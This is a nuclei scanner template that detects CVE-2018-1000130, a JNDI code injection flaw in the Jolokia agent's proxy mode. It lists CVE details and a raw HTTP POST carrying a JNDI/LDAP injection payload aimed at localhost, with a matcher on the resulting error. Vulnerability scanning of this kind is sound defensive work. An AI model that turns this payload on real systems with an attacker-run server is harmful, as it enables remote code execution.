nuclei-templates/http/cves/2018/CVE-2018-1000130.yaml

59 lines
2.0 KiB
YAML

id: CVE-2018-1000130
info:
name: Jolokia Agent - JNDI Code Injection
author: milo2012
severity: high
description: |
Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
reference:
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://access.redhat.com/errata/RHSA-2018:2669
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
- https://github.com/ARPSyndicate/cvemon
- https://github.com/SexyBeast233/SecBooks
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2018-1000130
cwe-id: CWE-74
epss-score: 0.89191
epss-percentile: 0.9873
cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: jolokia
product: webarchive_agent
tags: cve2018,cve,jolokia,rce,jndi,proxy
http:
- raw:
- |
POST /jolokia/read/getDiagnosticOptions HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
Content-Type: application/x-www-form-urlencoded
{
"type":"read",
"mbean":"java.lang:type=Memory",
"target":{
"url":"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
- type: status
status:
- 200
# digest: 490a0046304402206994805bfe4800c98a7123de3e07dd8d4eb8acd1a998e52f4e5f4358b9f56dc502205ed9dfc8fc39f4989d9c2cd237d55365ba24b29b63e822461ec17bb65c97a7fe:922c64590222798bb761d5b6d8e72950